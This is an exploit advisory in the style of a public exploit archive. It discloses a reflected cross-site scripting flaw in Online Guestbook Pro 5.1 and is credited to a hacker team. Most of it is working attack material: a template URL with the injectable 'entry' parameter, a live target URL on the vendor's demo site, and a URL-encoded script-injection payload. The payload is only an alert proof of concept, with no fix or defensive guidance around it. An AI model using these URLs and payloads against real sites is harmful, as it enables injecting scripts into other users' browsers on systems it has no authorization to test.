########################################################################### #-----------------------------I AM MUSLIM !!------------------------------# ########################################################################### ============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== [»] I am from the hell... ============================================================================== [»] Online Guestbook Pro 5.1 Remote XSS vulnerability ============================================================================== [»] Script: [ Online Guestbook Pro 5.1 ] [»] Language: [ PHP ] [»] Download: [ http://www.esoftpro.com/web_scripts_online_guestbook_pro.php ] [»] Founder: [ Moudi ] [»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...] [»] Team: [ EvilWay ] [»] SiteWeb: [ Want your site here ? ADD ME MSN. ] [»] Price: [ 24.95 $ ] ########################################################################### ===[ XSS ]=== [»] http://www.site.com/patch/ogp_show.php?display=[nm]&sort=&entry=[XSS]&search=&search_choice= ===[ LIVE ]=== [»] http://www.esoftpro.com/demo/OGP/ogp_show.php?display=150&sort=&entry=[XSS]&search=&search_choice= [»] XSS TO ADD: %22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E Note: -.- Author: Moudi ###########################################################################